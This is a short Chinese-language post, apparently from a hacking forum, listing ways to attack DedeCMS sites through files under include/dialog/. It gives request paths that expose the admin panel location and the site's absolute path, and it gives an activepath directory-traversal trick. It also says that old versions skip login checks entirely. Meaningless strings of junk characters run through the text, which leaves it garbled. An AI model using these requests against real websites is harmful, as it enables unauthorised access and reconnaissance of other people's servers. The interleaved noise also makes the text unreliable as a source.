1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
- E/ c' }, t; E, `
! h. f3 n# J% S8 l. Y5 t员帐号,新版本的就直接转向了后台.
4 I4 F q9 L. ~/ X, {% C- _# O# l+ i- m2 q+ d' J# t4 Y: ]! V' f! x
2.include/dialog/config.php会爆出后台管理路径/ r4 J* @: g) ~9 M* i
$ |. B% k' p" X# G6 r
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录" V ~' k, ]# A; t
7 D. { o& K9 L" W ^/ i5 ~* m4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
9 m( R5 b8 Z o0 D7 X. x; O7 ^0 n
1 S8 f* A0 i0 F" }) e5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
/ c R# c, ?9 {: s. h5 M9 C- l3 o' d2 d! k) B
到根目录去.不过这些版本的访问地址有些不同.' [" O/ X9 l( ~; F+ k7 t+ A
地址为require/dialog/select_soft.php?activepath=/././././././././! X/ {: h* _) A# {
- r5 c; t8 ]+ j! M0 T
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
% W/ }4 _* \( u2 V存在相同问题的文件还有& m- Q5 \ [6 W- W3 @2 s
include\dialog\select_images.php
! _6 L8 h" S5 d, Yinclude\dialog\select_media.php, J; ^- ?: \* M' m' ~* T
include\dialog\select_templets.php+ W. V* S. K: q! P1 w
|